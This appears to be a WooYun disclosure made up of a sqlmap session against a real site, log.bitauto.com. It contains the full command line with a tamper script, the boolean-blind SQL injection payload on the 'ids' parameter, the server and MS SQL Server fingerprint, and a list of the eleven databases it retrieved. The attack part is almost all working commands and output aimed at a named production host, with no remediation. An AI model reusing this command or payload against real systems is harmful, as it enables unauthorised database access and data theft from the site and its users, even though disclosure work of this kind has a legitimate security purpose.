WooYun.org

root@bt5:/pentest/database/sqlmap# python sqlmap.py -u "http://log.bitauto.com/newsstat/PageAreaStatistics/config.ashx?ids=10&callback=PageAreaStatistics.bind&seed=0.8790570520236984" -p ids --dbms=mssql --technique=B --string "PageAreaName" --tamper space2comment --dbs --threads 5
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:33:06
[14:33:06] [INFO] loading tamper script 'space2comment'
[14:33:06] [INFO] testing connection to the target url
[14:33:07] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ids
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ids=10) AND 6843=6843 AND (1928=1928&callback=PageAreaStatistics.bind&seed=0.8790570520236984
---
[14:33:07] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[14:33:07] [INFO] testing Microsoft SQL Server
[14:33:07] [INFO] confirming Microsoft SQL Server
[14:33:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:33:07] [INFO] fetching database names
[14:33:07] [INFO] fetching number of databases
[14:33:07] [INFO] resumed: 11
[14:33:07] [INFO] retrieving the length of query output
[14:33:07] [INFO] retrieved: 14
[14:33:08] [INFO] resuming partial value: 'Bi'
[14:33:13] [INFO] retrieved: BitAutoCMS2009             
[14:33:13] [INFO] retrieving the length of query output
[14:33:13] [INFO] retrieved: 15
[14:33:17] [INFO] retrieved: BitAutoStat2009             
[14:33:17] [INFO] retrieving the length of query output
[14:33:17] [INFO] retrieved: 8
[14:33:19] [INFO] retrieved: IndexLog           
[14:33:19] [INFO] retrieving the length of query output
[14:33:19] [INFO] retrieved: 6
[14:33:22] [INFO] retrieved: master           
[14:33:22] [INFO] retrieving the length of query output
[14:33:22] [INFO] retrieved: 5
[14:33:24] [INFO] retrieved: model           
[14:33:24] [INFO] retrieving the length of query output
[14:33:24] [INFO] retrieved: 4
[14:33:25] [INFO] retrieved: msdb           
[14:33:25] [INFO] retrieving the length of query output
[14:33:25] [INFO] retrieved: 9
[14:33:31] [INFO] retrieved: PieceStat           
[14:33:31] [INFO] retrieving the length of query output
[14:33:31] [INFO] retrieved: 6
[14:33:34] [INFO] retrieved: tempdb           
[14:33:34] [INFO] retrieving the length of query output
[14:33:34] [INFO] retrieved: 13
[14:33:39] [INFO] retrieved: VideoBase2013             
[14:33:39] [INFO] retrieving the length of query output
[14:33:39] [INFO] retrieved: 14
[14:33:44] [INFO] retrieved: VideoForumStat             
[14:33:44] [INFO] retrieving the length of query output
[14:33:44] [INFO] retrieved: 8
[14:33:47] [INFO] retrieved: VideoLog           
available databases [11]:
[*] BitAutoCMS2009
[*] BitAutoStat2009
[*] IndexLog
[*] master
[*] model
[*] msdb
[*] PieceStat
[*] tempdb
[*] VideoBase2013
[*] VideoForumStat
[*] VideoLog
[14:33:47] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/log.bitauto.com'